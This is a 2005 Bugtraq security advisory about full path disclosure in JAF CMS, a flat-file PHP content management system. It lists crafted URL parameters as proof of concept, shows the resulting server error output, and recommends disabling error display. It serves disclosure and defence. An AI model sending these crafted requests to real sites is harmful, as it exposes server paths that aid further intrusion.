| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 23 Jun 2005 09:21:43 -0000
From: the_day@...o.or.id
To: bugtraq@...urityfocus.com
Subject: [ECHO_ADV_20$2005] Full path disclosure JAF CMS
---------------------------------------------------------------------------
[ECHO_ADV_20$2005] Full path disclosure JAF CMS
---------------------------------------------------------------------------
Author: Dedi Dwianto
Date: June, 23th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv20-theday-2005.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : JAF CMS
version: < 3.0 Final
URL : http://jaf-cms.opensource-indonesia.com
Author : Salim "ph03y3nk"
Description :
JAF CMS - ...just another flat file CMS, is a Content Management System (CMS)
consist of a powerful set of PHP scripts that allow you to maintain personal
home page. There is no need for a database. The pages stored in a simple flat
file. I've coded this script because I realize that its hard to found server
(especially free space) offering PHP with database support already.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Full path disclosure:
A remote user can access the file directly to cause the system to display
an error message that indicates the installation path. The resulting error
message will disclose potentially sensitive installation path information
to the remote attacker.
* http://victim/index.php?page=forum&category=general&id=[id]/*
POC :
http://localhost/jaf-cms/index.php?page=forum&category=general&id=3/*
Warning: fopen(module/files/3/*): failed to open stream: No such file or directory
in /var/www/html/jaf-cms/module/forum/inc/csvfile.php on line 197
* http://victim/index.php?page=forum&view_type=topic&id=/*
POC :
http://localhost/jaf-cms/index.php?page=forum&view_type=topic&id=
Warning: fopen(module/files/): failed to open stream: Is a directory
in /var/www/html/jaf-cms/module/forum/inc/csvfile.php on line 197
* http://victim/index.php?page=guestbook&disp=[id]/*
POC :
http://victim/index.php?page=guestbook&disp=[id]/*
Notice: Undefined offset: 6 in /var/www/html/jaf-cm/module/guestbook/guestbook.php on line 250
B. Fix
report to vendor 21 June 2005
vendor No response
For User and do not know how to fix the script , change php.ini file setting
then turn on log_errors , and turn off display_error
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ Lieur Euy , MSR
~ newbie_hacker@...oogroups.com ,
~ #e-c-h-o@...NET
---------------------------------------------------------------------------
Contact:
~~~~~~~~
the_day || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------
Powered by blists - more mailing lists